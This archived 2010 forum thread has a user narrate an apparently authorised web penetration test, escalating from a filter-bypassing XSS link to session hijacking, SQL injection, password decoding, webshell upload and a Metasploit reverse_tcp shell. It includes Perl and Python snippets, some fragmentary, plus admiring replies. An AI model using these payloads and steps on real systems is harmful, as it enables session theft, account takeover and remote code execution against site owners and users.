PDA

View Full Version : XSS to Root



fb1h2s
09-27-2010, 12:48 AM
Last week I was assigned with a WPT , where I was assigned to check a Web Application
Normally in WPT s you will find a lot of bugs if you spend some good time analyzing the application in and out. And Tools like Web Inspect and Appscan are also of a good help to one extend.

But the application I was testing had some sort of filter which prevented the possibilities of any sort of normal web application attacks, and redirected all malicious request to one common error page.And all tools were giving out too many false positives.And I was almost going mad.

It was a module where users could trade objects. And three type of users where there Anonymous Users,Manager Users and as always a super user.Any one could access the anonymous user as the user name password was open for all, after loging in as Anonymous you could trade your things with other users , provided the managers accept it.As all your submissions went via the manager users.

The application dint used any cookies instead it used a session ID , which was passed in on every request via [GET] method


http://site.com/usrpage/?userid={D8A349A7-3503-4283-A1AA-9406DB6EE9C5}


So what strike me was, as that the user session Id hold the authentication and if I could get hold of another valid session I could be in that user privileges. And the only possible way is by tracking the HTTP_REFERRER value. And this could be only possible by making the administrator/manager clicking one of our links form the application. And then we could Hijack the user session. For those who are not aware of what am talking about, read a similar scenario .
http://fb1h2s.com/view.php?article_id=8

In order to achieve that, I need to find an XSS in the section where I could post my data for the manager approval or if managed to send a Hyperlink which when clicked, "boomed" my back end program will store the SessionIds.
But with the current filter which is blocking all unwanted request it was hardly possible.

And I was all stuck at this part, I even tried out all the XSS bypass stuff in http://ha.ckers.org/xss.html and none worked for me, and at that time VInay "vinnu" bro was online and was all ready for help :). I presented my scenario of the Filter and that I want to bypass that he gave me few cool tips , in which converting the Payload string that was a hyper link

<link href="http://evilsite.com/evilscript.py" />
bypassed the filter when half the string was hex encoded and other half was double hexed :).

So now First phase is done and I almost wasted one day :( .

Day 2 :

Now that I knew that I could send the managers with a hyper link and trick him to click the link stating that it was some wonderful products review. But the problem was that I don't know when the manager users will login and administrate my stuffs and the sessions will remain valid only till the user clicks Logout. And I wont be able to stay 24/7 online waiting for the manager to come online.
Even though I stay 3/4 of my time online, I need a better plan .

So I taught of writing an SMS alert application, which will send me an SMS to my phone when ever the click was initiated :D. So i could come online immediately and use the sessions. I chose 160by2.com for this and planned to automate it via perl CGI.
Why perl? because Apache was by default configured to handle perl CGI + Mechanize module in perl wis amazing .


While analyzing the 160by2.com for automating the request I found an SQL injection in one of the Post methods and started playing around with it and wasted few hours. And by night the code was all ready and I send the hyperlink to the victims with a convincing text.



#!c:/perl/bin/perl.exe
#CGI perl woot woot by fb1h2s
use CGI;
use strict;
use WWW::Mechanize;
use HTTP::Cookies;
#lets save session first
open (MYFILE, '>>session.txt);
print MYFILE "\t$ENV{HTTP_REFERER}\n\n";
print MYFILE "\t$ENV{HTTP_USER_AGENT}\n\n";
print MYFILE "\t$ENV{HTTP_ACCEPT}\n\n";
print MYFILE "\t$ENV{REMOTE_ADDR}\n\n";
close (MYFILE);
#inform the master via sms now
my $url = "http://160by2.com/";
my $mobileno = "mymobno"; #usernameno
my $password = "mypass"; #password
my $mobilewoot ="smstothisno"; #no to recive alert
my $woot_woot = " woot woot"; #msg text
my $mech = WWW::Mechanize->new();
$mech->cookie_jar(HTTP::Cookies->new());
$mech->get($url);
#my $output_page = $mech->content();
#print "$output_page";
$mech->form_id('login_form');
$mech->field(htxt_UserName => $mobileno);
$mech->field(txt_Passwd => $password);
$mech->click();
$mech->get("http://www.160by2.com/compose_sms.aspx");
$mech->form_id('frmcompose');
$mech->field(txt_msg => $woot_woot);
$mech->field(txt_mobileno => $mobilewoot);
#//"figure the rest out "
$mech->click();
#my $output_page1 = $mech->content();
#print "$output_page1";

fb1h2s
09-27-2010, 12:49 AM
Day 3:

Bye the next day evening by dinner time I got my "woot woot" Sms from my program confirming the click and I just hurried online and gained a manager session :). Now it was again disappointing , there where options to manage the transactions, approve and deny stuffs, but nothing good to proceed further was found. All manager pages were filtered too for any sql injection and other stuffs, so reached another dead end. By the way I dint forget to update the accounts Email Id with mine and Secret Question and answer so that I could get inside again .

Day 4:
I reset the manager password and gain access to manager interface, and kept analyzing the applications each and every fields, and by noon I noticed
that few state cookies were saved , which was used to confirm that no manipulation in datas are done , some sort of security feature . I used my fav ad-don tamper data to manipulate that request and altered it with an SQL injection check. Yepiiiiiii there I got an SQL bug finally in some session cookies huhhhh. I dumped few user names and passwords , the password dint had the look of a password though, It was sort of jumpled up, but I dnt hesitate to try them out , but none dint work. So taught of of dumping the whole database and trying them out, but the problem was that it was it was on the session cookies and I wasn't aware of any tools which would satisfy my needs, And I went around asking people whether they were aware of any such tools, and was disappointed, so taught of writing one as that it would be impossible to dump the entire data manually.

What I did was, grabbed a copy of rasurons darmssql.py which supported GET method and Union based Injection, and modified it to support POST request + Error Based injection.


def GetTheShit(head_URL):
try:
#print "\nam here",head_URL
file.write("\n[debug] "+head_URL)
connection = HTTPConnection(url)
head = {"Content-Type" : "application/x-www-form-urlencoded", "Accept" : "text/plain" ,"Referer" :"http://manycloe.com","Cookie":"State_date=head_url"}
parameters = urlencode({"fileds_value" : "sas", fileds_value" : "sas","cmdSubmit" : "Submit"})
connection.request("POST", "/GetPW.asp", parameters, head)
r2 = connection.getresponse()
source = r2.read()
#print source
match = re.findall("value '[\d\D]*' to",source)
match = match[0][7:-4]
print
return match
except (KeyboardInterrupt, SystemExit):
raise
except:
pass


Get_shit was darkmssqls HTTP connection engine and am not gone put the entire code

fb1h2s
09-27-2010, 12:49 AM
Day 5:

Code successfully dumped all passwords users and a
A sample out put is given here


hsklyu†‰†
qez}„…zJN
neuktu…GKO
"not real ones"


It was some kind of custom build build encryption, there is no way I could do something unless and until I find the algorithm. And the only possible way to figure that was the Change password option. So I reset my current password with few test values and obtained these results.


1234 == 26:>
aaaa == behk

Whuhuuu it was just another stupid algorithm,
String =String[i+3] was the logic :D


Security via Ob-security

Made another quick script which decrypted all the passwords. And later added this POC-Code to the report.



#python 2.5
#POC Program to decode the encrypted password
#
print "[+]Week encryption POC by "
encrypted= raw_input("[+]Enter Encrypted Password:")
password =[]
length =len (encrypted)
init =1
for i in range(0,length):
temp=ord(encrypted[i])
f =chr(temp-init)
init = init + 3
password.append(f)
print "Decoded password:"
print "".join(password)


Day 6:

And the pass cracking lead me a way to the Super Admin account :D , and there it was a file upload utility which let me upload anything I simply uploaded a simple ASP.NET command shell as other web shell were detected and deleted by Anti virus of that server. And then I made a MSF reverse_tcp and a Metpreter reverse Executable using metsploit



./msfpayload windows/shell/reverse_tcp LHOST=myhost LPORT=31337 X > c:\\sas.exe
Uploaded it to server and called it via the command shell and made a msf Multi handler listen for connection.

> use multi handler



http://fb1h2s.com/woot_woot.JPG

And there I had a session with NT/Authority priv :D a Shell is just a beginning, but my scope of work was over there.

I Was damn happy after after my tiresome chase after this application. Felt really great, may be because It took a week to reach the goal .

b0nd
09-27-2010, 09:47 AM
Mind blowing!!! Hats off to you fb1 !!! Thats a real hackerish attempt to achieve the goal.
Keep it up buddy!

"vinnu"
09-27-2010, 10:08 AM
It is not the number of days, which may go endless, rather the "atlast" fruit, that matters. And in this case, you have achieved what fills the heart of a hacker with bliss.

Keep on man. This world needs more out of ur best..."vinnu"

steve_ron
09-27-2010, 10:13 AM
Good Show, all the best for the future ones :)

prashant_uniyal
09-27-2010, 11:10 AM
Superb!!!! fb1h2s rockssSSss!!!! ;) :)

abhaythehero
09-28-2010, 02:25 AM
brilliant !!
:)
thanks for making this detailed description.

41.w4r10r
09-28-2010, 02:24 PM
As always fb1 rocked..............

I like one thing very much and that is when you say "Woot Woot"...........

AnArKI
09-28-2010, 07:21 PM
Thts an awesome piece of work......

the_empty
09-29-2010, 06:56 PM
that was cruel....
has the developer of that application committed suicide yet... or is he waiting for you to do that honor as well

sh0bhit
09-29-2010, 08:18 PM
amazing...................use of brain

that's_all
10-09-2010, 09:52 PM
You rock!
Cheers!

d4rkd4wn
10-12-2010, 02:20 PM
Awesome........................................... .....

ph0b0s
10-29-2010, 03:18 AM
great hack man...
the best thing which i liked in ur post is ur script to sms u back !!
this thing rocked !!

abhaythehero
12-23-2010, 08:32 PM
In order to achieve that, I need to find an XSS in the section where I could post my data for the manager approval or if managed to send a Hyperlink which when clicked, "boomed" my back end program will store the SessionIds.
But with the current filter which is blocking all unwanted request it was hardly possible.

And I was all stuck at this part, I even tried out all the XSS bypass stuff in http://ha.ckers.org/xss.html and none worked for me, and at that time VInay "vinnu" bro was online and was all ready for help . I presented my scenario of the Filter and that I want to bypass that he gave me few cool tips , in which converting the Payload string that was a hyper link
Code:

<link href="http://evilsite.com/evilscript.py" />

bypassed the filter when half the string was hex encoded and other half was double hexed .

Well , I was watching a video of a talk given by joe mccray
in defcon 18 . And he kind of like described the exact situation
fb1h2s is talking in these lines.

So i ripped that small part from the video and uploaded it >>

http://www.youtube.com/watch?v=S8xWnRTjRX8

Guess it would be helpful to anybody reading this.

@fb1h2s
bro if possible also please do elaborate that url encoding stuff.

Once again both you and "vinnu" bro did excellent work !! :)

prashant_uniyal
12-23-2010, 10:09 PM
Thanks for the share abhay bro..going in depth is also good to gain good knowledge on d topic :)

[s]
12-24-2010, 06:36 PM
nice research brother ;d

ajaysinghnegi
12-24-2010, 08:20 PM
Awesome Job bro..... very inspiring, keep up the Great work :D

SudoRooter
01-28-2011, 06:30 PM
Great man!!
Do not give up is the matter..

And now i learned a little bit more about the power of xss.. =)

rs3873
03-02-2011, 08:02 PM
AWESOME fb1

Snypter
05-15-2011, 12:49 AM
too good yaar !

keval_domadia
05-25-2011, 04:23 AM
You are a one nasty big monster.... (yea tht was a compliment)

Huskygold
12-01-2012, 01:26 AM
Man you're best post!!This ver interesting!